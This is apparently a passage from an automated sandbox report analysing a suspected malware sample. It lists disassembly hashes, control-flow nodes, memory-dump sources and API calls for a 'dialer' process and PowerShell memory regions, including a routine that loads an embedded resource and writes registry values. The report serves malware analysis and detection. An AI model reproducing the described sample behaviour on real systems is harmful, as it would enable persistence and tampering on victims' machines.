                                                                                                    • Instruction ID: 9601c36ac506440aec0706fa1daa84c964815a86d38a9c717f810216a4d9ad5c
                                                                                                    • Opcode Fuzzy Hash: 95c8ef1e0f399922a78404bf503d733f13d0a57ba047e01ab0114964292ddd94
                                                                                                    • Instruction Fuzzy Hash: 24518936B14A56CAE7209F79D4452EDB3B1FB89B88F445136EE0D42B28DF38E149D390

                                                                                                    Control-flow Graph

                                                                                                    control_flow_graph 173 7ff790dc1d04-7ff790dc1d35 lstrlenW call 7ff790dc1078 176 7ff790dc1da3-7ff790dc1db7 173->176 177 7ff790dc1d37 173->177 178 7ff790dc1d92-7ff790dc1da1 StrStrIW 177->178 178->176 179 7ff790dc1d39-7ff790dc1d4c 178->179 180 7ff790dc1d88-7ff790dc1d90 179->180 180->178 181 7ff790dc1d4e-7ff790dc1d84 180->181 181->180
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000025.00000002.2178354201.00007FF790DC1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF790DC0000, based on PE: true
                                                                                                    • Associated: 00000025.00000002.2178320133.00007FF790DC0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                    • Associated: 00000025.00000002.2178381779.00007FF790DC3000.00000002.00000001.01000000.00000000.sdmp
                                                                                                    • Associated: 00000025.00000002.2178381779.00007FF790DC6000.00000002.00000001.01000000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_37_2_7ff790dc0000_dialer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: lstrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 1659193697-0
                                                                                                    • Opcode ID: eada75f1b4e31a9ecaeea2633b12f8d73f9f7010800f93e817ee6859198f3569
                                                                                                    • Instruction ID: 5951ff80e3d801be4c7bd068c53dfd81a15410bd6830f6895306017e69e0a784
                                                                                                    • Opcode Fuzzy Hash: eada75f1b4e31a9ecaeea2633b12f8d73f9f7010800f93e817ee6859198f3569
                                                                                                    • Instruction Fuzzy Hash: 57115E36B18BE581DA749B21E4013EAA364FB88BC0F908031CE8D83B18DF3CE4559790

                                                                                                    Control-flow Graph

                                                                                                    control_flow_graph 182 7ff790dc1938-7ff790dc1943 call 7ff790dc194c ExitProcess
                                                                                                    APIs
                                                                                                      • Part of subcall function 00007FF790DC194C: FindResourceExA.KERNEL32(?,?,?,?,?,00007FF790DC1941), ref: 00007FF790DC1964
                                                                                                      • Part of subcall function 00007FF790DC194C: SizeofResource.KERNEL32(?,?,?,?,?,00007FF790DC1941), ref: 00007FF790DC197B
                                                                                                      • Part of subcall function 00007FF790DC194C: LoadResource.KERNEL32(?,?,?,?,?,00007FF790DC1941), ref: 00007FF790DC1990
                                                                                                      • Part of subcall function 00007FF790DC194C: LockResource.KERNEL32(?,?,?,?,?,00007FF790DC1941), ref: 00007FF790DC19A2
                                                                                                      • Part of subcall function 00007FF790DC194C: RegOpenKeyExW.KERNELBASE(?,?,?,?,?,00007FF790DC1941), ref: 00007FF790DC19CC
                                                                                                      • Part of subcall function 00007FF790DC194C: RegSetValueExW.KERNELBASE(?,?,?,?,?,00007FF790DC1941), ref: 00007FF790DC19F6
                                                                                                      • Part of subcall function 00007FF790DC194C: RegOpenKeyExW.KERNELBASE(?,?,?,?,?,00007FF790DC1941), ref: 00007FF790DC1A25
                                                                                                      • Part of subcall function 00007FF790DC194C: RegSetValueExW.KERNELBASE(?,?,?,?,?,00007FF790DC1941), ref: 00007FF790DC1A4F
                                                                                                    • ExitProcess.KERNEL32 ref: 00007FF790DC1943
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000025.00000002.2178354201.00007FF790DC1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF790DC0000, based on PE: true
                                                                                                    • Associated: 00000025.00000002.2178320133.00007FF790DC0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                    • Associated: 00000025.00000002.2178381779.00007FF790DC3000.00000002.00000001.01000000.00000000.sdmp
                                                                                                    • Associated: 00000025.00000002.2178381779.00007FF790DC6000.00000002.00000001.01000000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_37_2_7ff790dc0000_dialer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Resource$OpenValue$ExitFindLoadLockProcessSizeof
                                                                                                    • String ID:
                                                                                                    • API String ID: 2173734010-0
                                                                                                    • Opcode ID: a3f1f17fb1266c7b44eff39a08c5575f002c78a398db9eb90bfca44689dbb104
                                                                                                    • Instruction ID: d48e43298e007483f90bc98f2263be5f289a106b9d0892ced7938701abb26365
                                                                                                    • Opcode Fuzzy Hash: a3f1f17fb1266c7b44eff39a08c5575f002c78a398db9eb90bfca44689dbb104
                                                                                                    • Instruction Fuzzy Hash: 47A0220AF3823282EB283BB0082B0BCA2202F80300F802030C00B02382CC3CF0002BB8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2383933819.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_6810000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'p$4'p$4'p$4'p$4'p$4'p$4'p$4'p$84'l$84'l$tPp$tPp
                                                                                                    • API String ID: 0-2816616202
                                                                                                    • Opcode ID: 796b0a68a77eb3b5dae08629cd1655eae93382630d6b4d7b6e7935cc604d8f2d
                                                                                                    • Instruction ID: 5be10f27dfa3209c0b4f994840d16e40e391b55ba50dbd2b3abd7aaa492583e4
                                                                                                    • Opcode Fuzzy Hash: 796b0a68a77eb3b5dae08629cd1655eae93382630d6b4d7b6e7935cc604d8f2d
                                                                                                    • Instruction Fuzzy Hash: 6CE2B230B002089FDB54DB68C851BAEBBB6AF85314F14C06ADA15DF395DB72DD82CB91
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2383933819.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_6810000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'p$4'p$4'p$4'p$4'p$4'p$4'p$4'p
                                                                                                    • API String ID: 0-3630578132
                                                                                                    • Opcode ID: e83e5eabe0f95b914a2321e0e6572d4bed4c34f5bb7f4c392b866016f1b16d8e
                                                                                                    • Instruction ID: 20f01f5ac45085c4f2c5fd1fec8eac8aed7837c062aa3c2cfebd96b73cd565c8
                                                                                                    • Opcode Fuzzy Hash: e83e5eabe0f95b914a2321e0e6572d4bed4c34f5bb7f4c392b866016f1b16d8e
                                                                                                    • Instruction Fuzzy Hash: DB321471F002098FDB649B69D411B6EBBEAAFC5314F24847AD615DF350EB72C882CB91
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2373886595.0000000005D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_5d10000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 84'l$84'l$tPp$tPp$$p$$p$$p
                                                                                                    • API String ID: 0-247343218
                                                                                                    • Opcode ID: f9e82ca489a50081fef970441066e82324994783a6ae52b11a46a01a8c4a4196
                                                                                                    • Instruction ID: 0ff68c5030361985da926c703f2b92040de783b0b968252a0743332d2ddf5560
                                                                                                    • Opcode Fuzzy Hash: f9e82ca489a50081fef970441066e82324994783a6ae52b11a46a01a8c4a4196
                                                                                                    • Instruction Fuzzy Hash: 5F512735704214ABC7249AA8A810B7ABBE6BFC4710F24C55FEA45EB381DE75CC41C7A6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2373886595.0000000005D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_5d10000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'p$4'p$4'p$4'p
                                                                                                    • API String ID: 0-4019061985
                                                                                                    • Opcode ID: 5e7bd1108b54b3a94057b01f7fff714152ac90395739e427bd5b232363bbf9eb
                                                                                                    • Instruction ID: dafd00a98f790e0dc2942da2a04bec24c597a1f1b5dfcd124791d1329e7dd7ec
                                                                                                    • Opcode Fuzzy Hash: 5e7bd1108b54b3a94057b01f7fff714152ac90395739e427bd5b232363bbf9eb
                                                                                                    • Instruction Fuzzy Hash: 1C224671B04206AFCB10DB69A911B6ABBA3BFC1211F2480BBDD56DB351DB35C881C7B5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2373886595.0000000005D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_5d10000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: tPp$tPp
                                                                                                    • API String ID: 0-1160507146
                                                                                                    • Opcode ID: 4d930b0f586ee3e6892813716be414bce667925c2605ec0f40339d23bfcb0050
                                                                                                    • Instruction ID: 60280b8b7ee73d500fe808b4365e0cac36d4fa6e18b6b647e7b9414b6fc9ab73
                                                                                                    • Opcode Fuzzy Hash: 4d930b0f586ee3e6892813716be414bce667925c2605ec0f40339d23bfcb0050
                                                                                                    • Instruction Fuzzy Hash: 13012B31B44311AFCF21AA589840BAAFB63AB85350F24419BDE459F381C7715C02C7D5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2373886595.0000000005D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_5d10000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a28a4d5fb98bd663b5a3da25893587517fe8275a7fd83c688e221568e8a16b91
                                                                                                    • Instruction ID: 813e35ea9846518d920740938f1de0e9146e34f2928ec3f12004f2a7bdd37b3e
                                                                                                    • Opcode Fuzzy Hash: a28a4d5fb98bd663b5a3da25893587517fe8275a7fd83c688e221568e8a16b91
                                                                                                    • Instruction Fuzzy Hash: 21E2E774A00215AFD764DB69C990A69F7B2FB89310F14C1AADC1E9B741DB31ED82CF90
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2383933819.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_6810000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'p
                                                                                                    • API String ID: 0-481844870
                                                                                                    • Opcode ID: 38ebc89caf0268babf53de635fefb8d75d8a9917e4b4dbb39c69e0aa083c8d36
                                                                                                    • Instruction ID: 5036738e01aa0aa437048712cddb7637046eeb7d50ae7ee6496855bda0e7bc4c
                                                                                                    • Opcode Fuzzy Hash: 38ebc89caf0268babf53de635fefb8d75d8a9917e4b4dbb39c69e0aa083c8d36
                                                                                                    • Instruction Fuzzy Hash: 8721AC30E00209CFDBA49F29C560B6EB7E9AF85355F18816AD508CF264D775C881CBD1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2373886595.0000000005D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_5d10000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 384077f65823bb537964322f78c075f4939a3fae3660e772e18b7baede3037b3
                                                                                                    • Instruction ID: 704dded6350b3e519806479ffefdc9960cee62f0e53dcfddc8fa7f6e4801b772
                                                                                                    • Opcode Fuzzy Hash: 384077f65823bb537964322f78c075f4939a3fae3660e772e18b7baede3037b3
                                                                                                    • Instruction Fuzzy Hash: 5AD2D474A00615EFDB64DB64C990AA9F7B2FB89310F14C1AADC2A97741D731ED82CF90
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2225958248.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_2f00000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ebe87c339a555723d8c8854b058de387769e2862a347343e680f5296a1ea93bc
                                                                                                    • Instruction ID: e65833152d59b63f903c3277c6a14372a74e1f5399c2e4f86f4c6f4bf29380cb
                                                                                                    • Opcode Fuzzy Hash: ebe87c339a555723d8c8854b058de387769e2862a347343e680f5296a1ea93bc
                                                                                                    • Instruction Fuzzy Hash: EED10534E012089FDB05CFA8D584A9DBBB6FF88350F248159E905AB3A6C771ED81CF90
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2225958248.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_2f00000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ba40a85acd6f2b977d781525450b7c7c045c15e0ca621f3d4a22a2aa83fde847
                                                                                                    • Instruction ID: f140f7870ff9b19892761f72373b8af4ede070db19f723eb036c194fb144199c
                                                                                                    • Opcode Fuzzy Hash: ba40a85acd6f2b977d781525450b7c7c045c15e0ca621f3d4a22a2aa83fde847
                                                                                                    • Instruction Fuzzy Hash: 59816A3190A7919FC703DF2CD8A05D9BFB1EF46214B1A01C7C0D4DB2A3D625AE59CBA6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2225958248.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_2f00000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 8b2f05a390fef755a373eda383f005c13e7f839a57c040fe296c96fee0e55ba3
                                                                                                    • Instruction ID: dd0c4ab31711d782a7d0c9ec6a05ce7d17e67bc9a4a30ab1e726ba3f9a2750e6
                                                                                                    • Opcode Fuzzy Hash: 8b2f05a390fef755a373eda383f005c13e7f839a57c040fe296c96fee0e55ba3
                                                                                                    • Instruction Fuzzy Hash: 5F71CF319093918FCB06DF6CC8A069ABFB1EF46314B2941D7C4D48B2A7E235D956CBA1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2225958248.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_2f00000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e6662ee8ee97242ac7ea386ba98011faf5a1166a1dfe9834625863874cb58766
                                                                                                    • Instruction ID: 3b90dd4aa51c76b7c4c10643cb7dad4f9163aabacd4686536fab71c71b51c6ce
                                                                                                    • Opcode Fuzzy Hash: e6662ee8ee97242ac7ea386ba98011faf5a1166a1dfe9834625863874cb58766
                                                                                                    • Instruction Fuzzy Hash: 1551B834A00209EFDB05DF98D584A9DFBB2FF88314F248559E905AB3A5C772ED81DB50
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2373886595.0000000005D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_5d10000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 78da9192f3a5368504c29989568f64f0fd9a101f563265a4c3425852cc4c37b7
                                                                                                    • Instruction ID: 75d27ff5153f94e1f3b2d660b9b1b49c5bebfe10ab4d9528d061b0acd5e4a381
                                                                                                    • Opcode Fuzzy Hash: 78da9192f3a5368504c29989568f64f0fd9a101f563265a4c3425852cc4c37b7
                                                                                                    • Instruction Fuzzy Hash: DB41E571A04202EFDB20DF29E941E7ABBB2BF81254F5880ABDD15AB261D735C841C779
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2225958248.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_2f00000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 36b2b5c4a372a99de9fbea3656e80df9621aa11efb56344342d254e750011702
                                                                                                    • Instruction ID: 066c87678e752050ba06130ce3f9fff1af2c7bf1d93bfeb9dd049e638c135437
                                                                                                    • Opcode Fuzzy Hash: 36b2b5c4a372a99de9fbea3656e80df9621aa11efb56344342d254e750011702
                                                                                                    • Instruction Fuzzy Hash: F451B834A00208DFDB15CB98D484A9DFBF2BF88354F298199E405AB3A5C775ED82CB90
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2225958248.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_2f00000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 40c58bd08d75fe9abce8ba683a69284dae51b63a300e83e0d7a15ff9aa09b8d9
                                                                                                    • Instruction ID: ccf60b413a20a4f021fed1f85de44804334fcdb585da8d3bf74d8a59905bd3f4
                                                                                                    • Opcode Fuzzy Hash: 40c58bd08d75fe9abce8ba683a69284dae51b63a300e83e0d7a15ff9aa09b8d9
                                                                                                    • Instruction Fuzzy Hash: 8341F334E01208DFDB05CBA8D584A9DFBB2AF88304F248558E405AB3A5CB71ED82CF80
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2225958248.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_2f00000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e68baac9a549ee028b23f2a9d36c06ca90d7e71732e5b89c6ea0ad66e3b49d8c
                                                                                                    • Instruction ID: 1a5abd5a7c3b8d7c77117bad2ec77aca3133ac2d3c3a83700a92d1cd12d901f8
                                                                                                    • Opcode Fuzzy Hash: e68baac9a549ee028b23f2a9d36c06ca90d7e71732e5b89c6ea0ad66e3b49d8c
                                                                                                    • Instruction Fuzzy Hash: 9B418F75A002059FCB15DF5CC9909AAFBF2FF49350B254195D558AB392C331FD81CBA0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2225958248.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_2f00000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 745f2420f3faecf66dc77afccd6dc4fefdf46a72fef02220684a778bd7c108d5
                                                                                                    • Instruction ID: 8c2faf536b05bf242f09e31d34bdde4d5404ea48ba1f0eb97104d56f0d83acc8
                                                                                                    • Opcode Fuzzy Hash: 745f2420f3faecf66dc77afccd6dc4fefdf46a72fef02220684a778bd7c108d5
                                                                                                    • Instruction Fuzzy Hash: F911D735A00209EFDB05CFA8D884E9DFBB2FF48314F288158E505AB3A5C772E981DB40
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2225958248.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_2f00000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 15e8ab3cac7250521586310c753f12b928ccb31c72cb40354ccaa6c5ab15df1f
                                                                                                    • Instruction ID: 3a8f7642dcd7870de6d5006378ea6c17b42e4273f237472df130f07bfa06ec52
                                                                                                    • Opcode Fuzzy Hash: 15e8ab3cac7250521586310c753f12b928ccb31c72cb40354ccaa6c5ab15df1f
                                                                                                    • Instruction Fuzzy Hash: 0411FB35A00208EFDB45CBA8D484B9DFBF1BF49314F298158E405AB3A5C771ED82CB90
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2225958248.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_2f00000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: bf5304db5959e8e913985162f3dc23551525ec01ea1adf684b2183b9307e9b79
                                                                                                    • Instruction ID: 3c9a9968e4165feaaa7fa5cdda8dd13977ee955c02ffe077011c240a90fac2cc
                                                                                                    • Opcode Fuzzy Hash: bf5304db5959e8e913985162f3dc23551525ec01ea1adf684b2183b9307e9b79
                                                                                                    • Instruction Fuzzy Hash: 8E11D435E01209DFEB45CBA8D484A9DFBB6AF48314F24C559E405AB3A5C771ED86CF80
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2223470177.0000000002D6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D6D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_2d6d000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 94c40dc6bfb610269300cf261df92948fcbab3b6c8e2e648037e5a607ae0aef9
                                                                                                    • Instruction ID: 0d72b32b795436a239d9853163abbbcba6eed71f3a8841df90f3317ece4858e4
                                                                                                    • Opcode Fuzzy Hash: 94c40dc6bfb610269300cf261df92948fcbab3b6c8e2e648037e5a607ae0aef9
                                                                                                    • Instruction Fuzzy Hash: 7A01A7716043409BE7204A29DCC8777BF99EF85324F28855AED444B386C379DD45C6B1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2223470177.0000000002D6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D6D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_2d6d000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 76003d2f010df7c211d6b091ea12c4ad89f66534677baf73337245ca63bdc60b
                                                                                                    • Instruction ID: ed32db23c029781be457d11afce3a73c54731c91c8c51e765c895b312ebc6870
                                                                                                    • Opcode Fuzzy Hash: 76003d2f010df7c211d6b091ea12c4ad89f66534677baf73337245ca63bdc60b
                                                                                                    • Instruction Fuzzy Hash: 6C01526210E3C05FD7128B259C94766BFB4DF47224F1D81DBD8848F2A7C2699C45C772
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2225958248.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_2f00000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e334a1d00e3588c771609a61934abe0b860ca42ff02a596655af05221d185b94
                                                                                                    • Instruction ID: 95bbf54f169978c4e0600a9f10ccfaefe3e34d29318642b53cdc9050e256f9c3
                                                                                                    • Opcode Fuzzy Hash: e334a1d00e3588c771609a61934abe0b860ca42ff02a596655af05221d185b94
                                                                                                    • Instruction Fuzzy Hash: D2F0D435A001099FCB15CF9CD8A0AEEF7B1FF88324F208159E615A72A1C736EC52CB60
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2373886595.0000000005D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_5d10000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 94dcd9c3417ddde5a739424659c7a71515f3d8112e2138e887bec7be57352bee
                                                                                                    • Instruction ID: ed9212e284bc535bd5cb35e0ba834c0601072aa51440e58c1277253292bfc75c
                                                                                                    • Opcode Fuzzy Hash: 94dcd9c3417ddde5a739424659c7a71515f3d8112e2138e887bec7be57352bee
                                                                                                    • Instruction Fuzzy Hash: 5DD01271B08151DBC610DA68E440469F3E1EB9931532485EBD95997241D7729C139785
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2225958248.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_2f00000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: ;o^$;o^$;o^$;o^$;o^$;o^$;o^$;o^$;o^$;o^$;o^$;o^$\
                                                                                                    • API String ID: 0-3025743958
                                                                                                    • Opcode ID: 00b01772acef3ca3d183bbe7ce405a793af1f10e290dd63153903614297b78ee
                                                                                                    • Instruction ID: 108631dba0ded44089621f76dd90b6413922481e81e60220e1c8bb2170b9355b
                                                                                                    • Opcode Fuzzy Hash: 00b01772acef3ca3d183bbe7ce405a793af1f10e290dd63153903614297b78ee
                                                                                                    • Instruction Fuzzy Hash: E251DA4285FBE06FD7176B786CB10D63FB0AC2329471A02D3D5E4CE0A7D108899ED7A6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2373886595.0000000005D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_5d10000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'p$4'p$tPp$tPp$$p$$p$$p
                                                                                                    • API String ID: 0-1066480243
                                                                                                    • Opcode ID: 0def7e33f4c8846a11c85fc6109f1f3da142a93e4179462d552b38622d405ada
                                                                                                    • Instruction ID: b9fcbb54f876427829b6931cd0f2e074e7c95ffede0cd3fbb8eb10ffbd921419
                                                                                                    • Opcode Fuzzy Hash: 0def7e33f4c8846a11c85fc6109f1f3da142a93e4179462d552b38622d405ada
                                                                                                    • Instruction Fuzzy Hash: 38F12631B04205AFCB149B69A8017AAFFAAFFC5210F18807BDD56DB351DB32C945C7A5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2373886595.0000000005D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D10000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_5d10000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'p$4'p$tPp$$p$$p
                                                                                                    • API String ID: 0-2410924553
                                                                                                    • Opcode ID: 60974bf57b9d556f0054a706a1e47bfa993ebae9fe08df206260e2dd79483ee8
                                                                                                    • Instruction ID: ac542e58ca2ae4df9ff8b66ffaf55ffee3a999258cc75f16d9564d6c2fe121cf
                                                                                                    • Opcode Fuzzy Hash: 60974bf57b9d556f0054a706a1e47bfa993ebae9fe08df206260e2dd79483ee8
                                                                                                    • Instruction Fuzzy Hash: 10319F31A04204FFDB28EE44E941B6AB7A3BF85320F18C15BEC565F255C776E881CB99
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000026.00000002.2383933819.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_38_2_6810000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'p$4'p$84'l$tPp
                                                                                                    • API String ID: 0-2383950911
                                                                                                    • Opcode ID: 5911ef04341d33c21c3674491cb88509033bf41b42c1d579eaab4712599f3117
